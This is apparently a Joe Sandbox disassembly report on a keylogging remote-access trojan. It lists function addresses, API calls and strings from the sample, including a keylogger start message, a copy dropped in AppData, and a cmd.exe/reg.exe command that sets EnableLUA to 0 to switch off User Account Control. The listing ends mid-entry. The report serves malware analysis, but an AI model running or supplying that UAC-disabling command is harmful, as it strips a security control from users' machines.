Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Uniqueness

Uniqueness Score: -1.00%

Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
CloseHandle.KERNEL32(?), ref: 00404DDB

Strings

PkGNG, xrefs: 00404CCC

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: PkGNG
API String ID: 3360349984-263838557
Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Uniqueness

Uniqueness Score: -1.00%

Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

Offline Keylogger Started, xrefs: 0040B16B
], xrefs: 0040B180
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D55B
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

0, xrefs: 0041D52B
MsgWindowClass, xrefs: 0041D526

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
C:\Windows\System32\cmd.exe, xrefs: 00407796

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 004076C4
SG, xrefs: 004076DA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
API String ID: 0-2388126545
Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
SetEvent.KERNEL32(?), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Uniqueness

Uniqueness Score: -1.00%

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Uniqueness

Uniqueness Score: -1.00%

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Uniqueness

Uniqueness Score: -1.00%

Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 0044BA39

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

NG, xrefs: 00415B3E
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
